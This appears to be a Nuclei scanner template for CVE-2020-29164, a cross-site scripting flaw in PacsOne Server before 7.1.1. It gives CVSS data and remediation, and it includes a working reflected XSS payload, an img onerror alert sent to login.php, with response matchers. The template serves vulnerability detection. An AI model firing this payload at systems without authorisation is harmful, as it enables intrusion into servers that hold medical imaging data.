id: CVE-2020-29164 info: name: PacsOne Server <7.1.1 - Cross-Site Scripting author: geeknik severity: medium description: PacsOne Server (PACS Server In One Box) below 7.1.1 is vulnerable to cross-site scripting. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to PacsOne Server version 7.1.1 or later to mitigate this vulnerability. reference: - https://gist.github.com/leommxj/0a32afeeaac960682c5b7c9ca8ed070d - https://pacsone.net/download.htm - https://nvd.nist.gov/vuln/detail/CVE-2020-29164 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-29164 cwe-id: CWE-79 epss-score: 0.00205 epss-percentile: 0.5782 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rainbowfishsoftware product: pacsone_server tags: cve,cve2020,pacsone,xss,rainbowfishsoftware http: - method: GET path: - "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E" matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: word part: body words: - '1' - type: status status: - 200 # digest: 4a0a00473045022100e4cd86a33a8736c6155db4480c171ff2c16c9d428cb23763d8c9b388930d39ad02204938d7a8e853b5d55ae167003a2b02d0f13bc0e652bc076614b44680c693418f:922c64590222798bb761d5b6d8e72950